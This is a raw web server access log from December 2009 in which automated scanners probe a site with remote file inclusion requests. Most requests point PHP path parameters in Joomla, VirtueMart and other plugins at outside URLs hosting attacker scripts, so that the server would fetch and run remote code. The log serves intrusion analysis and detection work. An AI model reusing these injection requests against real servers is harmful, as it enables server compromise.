92.50.143.90 - - [14/Dec/2009:08:57:58 -0800] "GET /logs/access_090415.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:08:57:58 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:08:57:59 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 200 14919 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:08:58:05 -0800] "GET /logs/access_090408.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.111.0.114 - - [14/Dec/2009:08:58:21 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://lukas-wuerzburger.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
89.111.0.114 - - [14/Dec/2009:08:58:21 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://lukas-wuerzburger.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.66.28.36 - - [14/Dec/2009:08:59:07 -0800] "GET /logs/access_080626.log//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
61.66.28.36 - - [14/Dec/2009:08:59:07 -0800] "GET /index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
61.66.28.36 - - [14/Dec/2009:08:59:08 -0800] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
88.250.216.231 - - [14/Dec/2009:09:00:18 -0800] "GET /blog/index.php/2009/04/05/yuma-proving-grounds-122908-123108/ HTTP/1.0" 200 19974 "http://dmulk.com/blog/2009/04/05/yuma-proving-grounds-122908-123108/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "dmulk.com"
88.250.216.231 - - [14/Dec/2009:09:00:26 -0800] "POST /blog/wp-comments-post.php HTTP/1.0" 302 1 "http://dmulk.com/blog/2009/04/05/yuma-proving-grounds-122908-123108/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "dmulk.com"
88.250.216.231 - - [14/Dec/2009:09:00:28 -0800] "GET /blog/index.php/2009/04/05/yuma-proving-grounds-122908-123108/comment-page-1/ HTTP/1.0" 200 20046 "http://dmulk.com/blog/2009/04/05/yuma-proving-grounds-122908-123108/comment-page-1/#comment-1399" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "dmulk.com"
61.66.28.36 - - [14/Dec/2009:09:00:33 -0800] "GET /logs/access_080714.log//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:00:48 -0800] "GET /logs/access_090508.log%20%20/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:00:48 -0800] "GET /logs/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:00:48 -0800] "GET /skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:00:52 -0800] "GET /logs/access_090329.log%20%20/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:01:09 -0800] "GET /logs/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:01:09 -0800] "GET /logs/access_090508.log%20%20/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:01:10 -0800] "GET /skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:01:13 -0800] "GET /logs/access_090329.log%20%20/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:02:01 -0800] "GET /logs/access_090415.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:02:01 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:02:02 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 200 14919 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:02:06 -0800] "GET /logs/access_090408.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:02:37 -0800] "GET /logs/access_090508.log/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:02:37 -0800] "GET /logs/access_090329.log/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:02:38 -0800] "GET /logs/access_090508.log/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:09:02:38 -0800] "GET /logs/access_090329.log/skins/advanced/advanced1.php?pluginnpath[0]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:03:13 -0800] "GET /logs/access_081127.log/?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:03:13 -0800] "GET /?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:03:13 -0800] "GET /logs/?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 200 130218 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:03:15 -0800] "GET /logs/access_080917.log/?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:09:04:05 -0800] "GET /write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:09:04:06 -0800] "GET /logs//write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:09:04:06 -0800] "GET /logs/access_090807.log%20%20//write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:09:04:06 -0800] "GET /logs/access_090810.log%20%20//write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:09:04:25 -0800] "GET /logs/access_090807.log//write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:09:04:36 -0800] "GET /logs/access_090810.log//write.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:05:07 -0800] "GET /logs/access_080317.log//admin/index.php?o=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:05:08 -0800] "GET /logs/access_080507.log//admin/index.php?o=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.197.196.10 - - [14/Dec/2009:09:05:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
203.197.196.10 - - [14/Dec/2009:09:05:11 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:05:18 -0800] "GET /logs/access_090408.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:05:18 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:05:18 -0800] "GET /component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:05:18 -0800] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:05:18 -0800] "GET /logs/access_091019.log%20%20//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:05:19 -0800] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:05:19 -0800] "GET /component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:05:19 -0800] "GET /logs/access_091019.log%20%20//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [14/Dec/2009:09:05:20 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:05:20 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 200 14919 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:05:23 -0800] "GET /logs/access_090616.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:06:36 -0800] "GET /logs/access_081127.log%20%20/?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:06:53 -0800] "GET /logs/access_090409.log%20%20/?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:07:09 -0800] "GET /latest.php?_zb_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:07:10 -0800] "GET /logs/access_091203.log/latest.php?_zb_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:07:10 -0800] "GET /logs/latest.php?_zb_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:09:08:26 -0800] "GET /logs/access_090808.log/skins/advanced/advanced1.php?pluginpath[0]=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:09:08:51 -0800] "GET /logs/access_090807.log/skins/advanced/advanced1.php?pluginpath[0]=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:09:18 -0800] "GET /zSmarty.class.php?ROOT_DIR=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:09:18 -0800] "GET /logs/access_091203.log/zSmarty.class.php?ROOT_DIR=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:09:18 -0800] "GET /logs/zSmarty.class.php?ROOT_DIR=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:09:10:15 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:09:10:15 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:09:10:16 -0800] "GET /logs/access_080222.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:09:10:37 -0800] "GET /logs/access_090408.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:11:40 -0800] "GET /logs/access_090711.log%20%20//include/lib.inc.php?site_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:11:40 -0800] "GET /logs//include/lib.inc.php?site_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:11:41 -0800] "GET /include/lib.inc.php?site_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:11:41 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:11:41 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:11:41 -0800] "GET /logs/scriptsold.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:12:18 -0800] "GET /logs/access_080724.log%20%20//include/lib.inc.php?site_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:09:13:43 -0800] "GET /config.php?path_to_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:09:13:43 -0800] "GET /logs//config.php?path_to_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:09:13:43 -0800] "GET /logs/access_080207.log%20%20//config.php?path_to_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:09:13:43 -0800] "GET /logs/access_080213.log%20%20//config.php?path_to_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:14:04 -0800] "GET /logs/access_091019.log//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:14:05 -0800] "GET /logs/access_091019.log//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:14:15 -0800] "GET /logs/access_090717.log//admin/index.php?o=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:14:30 -0800] "GET /logs/access_091203.log%20%20/latest.php?_zb_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:15:30 -0800] "GET /logs/access_091203.log%20%20/zSmarty.class.php?ROOT_DIR=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:09:17:16 -0800] "GET /logs/access_080213.log//config.php?path_to_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:09:17:16 -0800] "GET /logs/access_080207.log//config.php?path_to_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:09:17:56 -0800] "GET /logs/access_090808.log/skins/advanced/advanced1.php?pluginpath[0]=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:09:18:23 -0800] "GET /logs/access_090807.log/skins/advanced/advanced1.php?pluginpath[0]=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:20:29 -0800] "GET /logs/access_090711.log//include/lib.inc.php?site_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:20:39 -0800] "GET /logs/access_080724.log//include/lib.inc.php?site_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.250.149.132 - - [14/Dec/2009:09:21:50 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 200 130218 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
64.157.4.43 - - [14/Dec/2009:09:21:56 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
210.250.149.132 - - [14/Dec/2009:09:21:56 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 200 15013 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:09:26:07 -0800] "GET /components/com_thopper/inc/thopper.inc.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:09:26:07 -0800] "GET /logs//components/com_thopper/inc/thopper.inc.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:09:26:07 -0800] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/thopper.inc.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:09:26:08 -0800] "GET /logs/access_080505.log%20%20//components/com_thopper/inc/thopper.inc.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:09:26:10 -0800] "GET /logs//components/com_thopper/inc/thopper.inc.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:09:26:10 -0800] "GET /components/com_thopper/inc/thopper.inc.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:09:26:10 -0800] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/thopper.inc.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.197.196.10 - - [14/Dec/2009:09:26:10 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
203.197.196.10 - - [14/Dec/2009:09:26:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:09:26:10 -0800] "GET /logs/access_080505.log%20%20//components/com_thopper/inc/thopper.inc.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [14/Dec/2009:09:26:54 -0800] "GET /logs/scriptsold.log//tools/send_reminders.php?noSet=0&includedir=http://ikant.co.kr/data/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:27:06 -0800] "GET /logs/access_080410.log%20%20/index.php?page=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:27:06 -0800] "GET /logs/index.php?page=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [14/Dec/2009:09:27:07 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:27:07 -0800] "GET /index.php?page=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 200 14805 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [14/Dec/2009:09:27:41 -0800] "GET /logs/access_080919.log%20%20/index.php?page=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:09:27:49 -0800] "GET /logs/access_080609.log//db.php?commonpath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:09:27:49 -0800] "GET /db.php?commonpath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:09:27:49 -0800] "GET /logs//db.php?commonpath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:09:27:58 -0800] "GET /logs/access_080721.log//db.php?commonpath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:09:28:47 -0800] "GET /logs/access_090321.log%20%20//db.php?commonpath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:09:28:47 -0800] "GET /db.php?commonpath=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
